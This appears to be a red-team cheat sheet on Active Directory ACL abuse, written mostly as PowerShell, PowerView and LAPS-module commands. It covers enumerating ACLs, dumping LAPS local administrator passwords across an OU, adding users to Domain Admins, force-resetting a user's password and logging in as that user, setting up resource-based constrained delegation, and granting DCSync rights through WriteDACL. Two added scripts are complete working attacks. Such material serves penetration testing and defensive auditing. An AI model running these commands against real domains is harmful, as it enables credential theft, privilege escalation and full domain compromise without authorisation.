ACL Abuse

Enumeration

ADModule:
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1

# Get DistinguishedName (shown in the default output)
Get-ADUser -Identity USER

# Find ACLs on that user object; IdentityReference is who holds the right,
# ActiveDirectoryRights is what they hold, ObjectType is the attribute/right GUID
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

PowerView_Dev:
# -ResolveGUIDs turns ObjectType GUIDs into names (e.g. ms-Mcs-AdmPwd, User-Force-Change-Password)
Find-InterestingDomainACL -ResolveGUIDs

PowerView:
Invoke-ACLScanner -ResolveGUIDs

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS. With -ResolveGUIDs the ObjectType resolves to ms-Mcs-AdmPwd: the LAPS password attribute is marked confidential, so reading it needs the ExtendedRight (control access) on top of ReadProperty. The principal in IdentityReferenceName can read the cleartext local administrator password of every computer under that OU (or of the single computer, when the ACE is on a computer object).
LAPS Module:
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1

# Find which principals hold the extended right to read LAPS passwords for computers in an OU
Find-AdmPwdExtendedRights -Identity <OU>

# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>
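The same check and read can be done with ADModule alone, which is useful when the AdmPwd.PS module is not on the box. The block below is an added example, not code from the original page: it looks up the ms-Mcs-AdmPwd schema GUID (it differs per forest, so it is never hard-coded), lists the ACEs on the OU that grant ReadProperty/ExtendedRight on that attribute, and then reads the password and its expiry for every computer under the OU. The OU DN is a placeholder and ADModule is assumed to be imported.

```powershell
# Added example (not from the original page). Assumes ADModule is imported and the
# current user already holds the LAPS read right on the OU. Placeholder OU DN below.
$ou = 'OU=Servers,DC=it,DC=gcb,DC=local'

# 1. Resolve the schemaIDGUID of ms-Mcs-AdmPwd from the schema partition
$schemaNC = (Get-ADRootDSE).schemaNamingContext
$lapsAttr = Get-ADObject -SearchBase $schemaNC -Filter { name -eq 'ms-Mcs-AdmPwd' } -Properties schemaIDGUID
$lapsGuid = [guid]$lapsAttr.schemaIDGUID

# 2. Which principals can read the confidential attribute on this OU?
#    ObjectType on the ACE must match the attribute GUID; the right must include
#    ExtendedRight (control access) or ReadProperty
(Get-Acl "AD:\$ou").Access |
    Where-Object {
        $_.ObjectType -eq $lapsGuid -and
        $_.ActiveDirectoryRights -match 'ExtendedRight|ReadProperty'
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, IsInherited

# 3. Read the passwords directly (empty value means LAPS is not deployed on that host,
#    or we lack the right); ms-Mcs-AdmPwdExpirationTime is a FILETIME
Get-ADComputer -SearchBase $ou -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime |
    Where-Object { $_.'ms-Mcs-AdmPwd' } |
    Select-Object Name,
        @{ n = 'Password'; e = { $_.'ms-Mcs-AdmPwd' } },
        @{ n = 'Expires';  e = { [datetime]::FromFileTime([int64]$_.'ms-Mcs-AdmPwdExpirationTime') } }
```

Step 2 is the check to run before claiming a finding: an ACE with ReadProperty on the whole object (ObjectType all zeros) does not grant the confidential attribute; it has to be ExtendedRight, or ReadProperty scoped to ms-Mcs-AdmPwd.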

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group. WriteProperty on the member attribute (or GenericAll) lets the principal add any account; Self-Membership is the validated write on member, which only lets the holder add its own account.
ADModule:
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS

# Check
Get-ADGroupMember -Identity "LocalAdmins"

PowerView_Dev:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can write msDS-AllowedToActOnBehalfOfOtherIdentity on the computer object and perform a Resource Based Constrained Delegation attack: put a machine account we control into that attribute, then S4U2Self/S4U2Proxy as that account to obtain a service ticket to the target as any user.

GenericAll over User Object

Can reset the user's password without knowing the old one (GenericAll includes the User-Force-Change-Password extended right), then authenticate as that user. The reset is noisy: it generates event 4724 on the DC and the real user loses access.
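Check, reset and verify, as an added example rather than code from the original page. It assumes ADModule is imported (PowerView_Dev shown as the alternative), that the compromised user holds GenericAll or the User-Force-Change-Password right over the target, and uses targetuser, techcorp.local and the new password as placeholders.

```powershell
# Added example (not from the original page). Placeholders: targetuser, techcorp.local, new password.
$user   = 'targetuser'
$newPwd = ConvertTo-SecureString 'NewP@ss123!' -AsPlainText -Force

# 1. Confirm the right exists on the object before touching the account.
#    User-Force-Change-Password extended right GUID: 00299570-246d-11d0-a768-00aa006e0529
$forceChange = [guid]'00299570-246d-11d0-a768-00aa006e0529'
$dn = (Get-ADUser -Identity $user).DistinguishedName
(Get-Acl "AD:\$dn").Access |
    Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        ($_.ActiveDirectoryRights -match 'GenericAll' -or $_.ObjectType -eq $forceChange)
    } |
    Select-Object IdentityReference, ActiveDirectoryRights, ObjectType

# 2. Reset without the old password. -Reset is the force-change path;
#    -OldPassword/-NewPassword would need the current password and a different right.
Set-ADAccountPassword -Identity $user -Reset -NewPassword $newPwd

# 3. Verify by authenticating as the user against the domain
$cred = New-Object System.Management.Automation.PSCredential("techcorp\$user", $newPwd)
Get-ADUser -Identity $user -Server techcorp.local -Credential $cred |
    Select-Object SamAccountName, Enabled, PasswordLastSet

# PowerView_Dev equivalent of step 2:
# Set-DomainUserPassword -Identity $user -AccountPassword $newPwd -Verbose
```

If the target has a long password-minimum-age or "user must change password at next logon" set, interactive logon will prompt for another change; the network authentication in step 3 still works.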

WriteDACL over Domain Object

WriteDACL on the domain object itself (DC=techcorp,DC=local, not the domain controller's computer object) lets us add an ACE granting a user the three replication extended rights (DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, DS-Replication-Get-Changes-In-Filtered-Set), i.e. DCSync privileges.
RACE:
Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose

PowerView3:
# -TargetIdentity is the object whose DACL is modified (the domain), -PrincipalIdentity the user who receives the rights
Add-DomainObjectAcl -TargetIdentity 'DC=techcorp,DC=local' -PrincipalIdentity USER -Rights DCSync

Resources

Abusing Active Directory ACLs/ACEs
Red Teaming Experiments